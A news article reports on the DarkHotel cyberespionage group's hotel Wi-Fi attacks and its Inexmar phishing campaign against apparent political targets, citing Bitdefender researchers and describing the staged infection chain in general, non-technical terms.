The group going under the name of “DarkHotel” has returned to hack and cyberspy on their high-value victims once again.
The group has been active for over 10 years now, using the Wi-Fi connections in luxury hotels all over the world to hack into the computers of business travelers and attack them with malware.
The way the group works is that they compromise the hotel Wi-Fi hotspots in order to be able to deliver the payload to their selected targets. The exact way of doing this is still unknown, but some cybersecurity experts think it could have something to do with either exploiting vulnerabilities in server software or infiltrating the hotel and having physical access to the machines.
The people behind the group have been updating their tactics and malware payloads regularly so they could stay on top of spying their high-value victims, like CEOs and other high-ranking corporate officials. They are usually mixing phishing and social engineering with complex Trojans in order to do so.
This time around, DarkHotel’s interests are different. Now they seem to be targeting politicians using a new form of malware called Inexmar. The researchers who analyzed the malware are researchers from Bitdefender, and the way the connected the malware to the DarkHotel group was by finding the similarities with the payloads the group had delivered before.
Like many others of its kind, the Inexmar attack starts off with high-level phishing emails that are all personalized to be interesting and seem true to their target. Bogdan Botezatu, the senior e-threat analyst at Bitdefender, told ZDNet that this requires the phishing email to be crafted very carefully and target only one person at a time.
It is still unknown who the actual target of these attacks is, and the researchers cannot tell much from the sample of the malware that they got, but it would seem that the phishing emails could be pointing to government and politicians.
The email contains a self-extracting archive package named winword.exe which starts off the Trojan downloader process when opened.
The downloader then opens a Word document under the name of ‘Pyongyang Directory Group email SEPTEMBER 2016 RC_Office_Coordination_Associate.docx’ to make sure that the victim won’t get suspicious. The document contains false contacts in the North Korea capital as well as references to some major organizations. It even warns the reader about the malicious attacks.
To make sure the malware stays undetected, it is downloaded in stages, which is a signature move to the attacks executed by DarkHotel.
Then the malware runs a mshta.exe operation, which is an actual Microsoft HTML Application host needed to execute .HTA files and downloads the second part of the payload, compromising the target with the Trojan malware.
Malware researchers Cristina Vatamanu, Alexandru Rusu, and Alexandru Maximciuc wrote a paper on the method, saying that this way of compromising a target not only assures that the malware stays up to date but also gives the attacker more flexibility in the distribution of the malware.
Because of the highly sophisticated method of working and the importance of their targeted victims thus far, it seems that DarkHotel could be state-backed and have serious skills and resources, Botezatu says.